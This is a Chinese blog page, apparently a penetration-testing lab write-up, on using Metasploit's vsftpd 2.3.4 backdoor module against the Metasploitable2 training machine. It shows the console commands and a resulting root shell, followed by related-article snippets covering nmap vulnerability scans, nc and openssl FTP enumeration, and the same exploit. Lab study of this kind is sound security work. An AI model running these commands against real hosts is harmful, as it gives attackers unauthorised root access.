Metasploit2 - tcp port 21 - vsftpd

最新推荐文章于 2024-08-03 21:27:48 发布
最新推荐文章于 2024-08-03 21:27:48 发布
阅读量1.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Pentesting Metasploitable2 Linux Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nixawk/article/details/38281927
本文详细介绍了如何使用Metasploit框架针对vsftpd服务通过tcp端口21进行渗透测试。内容涵盖漏洞分析、exploit模块选择、攻击步骤以及防范措施,为安全研究人员提供了实战指导。

Metasploitable2 的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)” [笑脸], 那么在6200端口会监听一个后门.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(vsftpd_234_backdoor) > run
 
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.113
最低0.47元/天 解锁文章

200万优质内容无限畅学
Metasploitable2 渗透测试(ftp 端口21
半夜好饿的博客
09-17 3777
端口扫描: 输入search scanner/ftp找到辅助的扫描工具。 1、利用auxiliary/scanner/ftp/ftp_version模块。 使用auxiliary/scanner/ftp/ftp_version模块,并设置好目标地址,端口采用默认的21,exploit -j开始,查看ftp的版本,版本是vsFTPd 2.3.4 继续search vsFTPd看看有没有可以利用...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4927
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
利用MetasploitVSFTPD2.3.4渗透攻击提权
渗透测试
05-06 2069
文章目录前言一、Metasploit中使用数据库二、利用msf中nmap扫描三、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.提权总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~
metasploit利用vsftpd漏洞获取root权限
weixin_34268579的博客
09-28 458
2019独角兽企业重金招聘Python工程师标准>>> ...
tcp_prot
星空探索
10-01 639
{ .type =       SOCK_STREAM, .protocol =   IPPROTO_TCP, .prot =       &tcp_prot, .ops =        &inet_stream_ops, .flags =      INET_PROTOSW_PERMANENT |      INET_PROTOSW_ICSK, }, struct pr
端口渗透——21端口FTP
negnegil的博客
09-15 9852
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口是21,当共享数据时会被打开。 枚举ftp服务的版本信息 nc -vn <ip> 21 获取FTP证书(如果存在) openssl s_client -connect <ip>:21 -starttls ftp 匿名登录 文件可以被隐藏,所以匿名登录可能看不到文件 ftp <ip> >anonymous >anonymous >ls -a 浏览器连
Metasploit(学习笔记)
zhaji001
08-07 5285
之前阅读了《Metasploit渗透测试指南》准备更深入了解。 MSF终端命令: (kali 中Tab键自动补全) show exploits   列出框架中的渗透攻击模块 show  payloads  列出框架中攻击载荷 show auxiliary   列出框架中辅助攻击模块 search  name  查找框架中攻击模块 info 显示模块的信息 use name  选择要使...
Metasploit渗透测试框架
乌云毕力格博客
07-16 2321
第一章:走近Metasploit渗透测试框架 cisp-pte视频教程:https://download.youkuaiyun.com/download/asd2588258/20323819 渗透测试是一种有目的性的、针对目标机构计算机系统安全的检测评估方法。渗透测试可以 发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权。通过 渗透测试可以知道目标机构的计算机系统是否易于受到攻击,现有的安全部署是否能妥善地抵御攻击,以及哪部分安全机制可能被绕过,等等。渗透测试的主要目的是改善目标机构的安
网络安全学习之利用Metasploit进行信息收集
最新发布
Aurevoirs的博客
08-03 1098
利用metasploit 进行信息收集
kali linux攻击靶机Metasploitable2实验------vsFTPd 2.3.4
边城浪子的博客
07-26 1222
漏洞:vsFTPd 2.3.4 靶机:Metasploitable2 step1:开启kali linux 和 Metasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln 192.168.56.129 从结果中得知有高危漏洞,vsFTPd 2.3.4 step3:漏洞利用 命令:msfconsol...
浅谈TCP协议的端口(port
ShuaiWang优快云的博客
03-09 1万+
一:如何查看端口 1.查看所有的端口占用情况:    在windows命令行窗口下执行: C:\>netstat -ano 2.查看指定端口的占用情况  C:\>netstat -aon|findstr "9050" 3.也可以使用其他第三方工具,例如:   TcpView,下载地址:http://pan.baidu.com/s/1bnGfIwv   Fport” (可到http://
127.0.0.1、192.168.0.111、本机地址、URL
qq_23617681的博客
05-09 1万+
127.0.0.1是本机地址(就是本地的另一种表示形式,只不过用这种形式表达)。 不管本地是否连上网络,本机都具备这个地址。 主要用于测试,ping 127.0.0.1时,不联网也能通。 这个地址一定是指本机。 192.168.0.111/123是本机地址在局域网分配的IP。 192.168.1.111是一种最常见的局域网类型。其它还有a类、b类。这种形式是c类。 它能容纳25
ssh: connect to host 192.168.1.111 port 22: No route to host
程永强
10-17 9448
ssh: connect to host 192.168.1.111 port 22: No route to host
什么是FTP?FTP端口号是多少?FTP的端口号能改吗?ftp的端口号20、21有何区别?ftp命令?...
热门推荐
yyt7529的专栏
05-22 5万+
什么是FTP?FTP就是文件传输协议 File Transfer Protocol 的缩写.FTP端口号是多少?21FTP的端口号能改吗?能ftp的端口号20、21有何区别?一个是数据端口,一个是控制端口,控制端口一般为21,而数据端口不一定是20,这和FTP的应用模式有关,如果是主动模式,应该为20,如果为被动模式,由服务器端和客户端协商而定FTP Port模式和
TCP端口大全
转载
11-26 2万+
1/tcp tcpmux TCP Port Service Multiplexer  2/tcp compressnet Management Utility  3/tcp compressnet Compression Process  5/tcp rje Remote Job Entry  7/tcp echo Echo  9/tcp discard Discard  11/tcp
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
m0_62670778的博客
05-10 3833
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 3367
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
趣谈网络协议(三)
chujiaohui3550的博客
05-23 278
我相信,只要对电脑有点入门的,都知道如何查询本地ip地址.在win中是ipconfig.linux中是ifconfig 如上图,192.168.1.117就是我的局域网地址.局域网内通过此ip就能访问我的电脑 再举一个场景,我们新装了宽带,买了路由器都知道访问地址是192.168.1....
华三交换机知道ip怎么查找主机ip在接入交换机哪个端口下
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
04-15 1万+
华三S5120V3-52S-SI。
HCIP作业
m0_74262682的博客
03-23 515
hcip作业
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值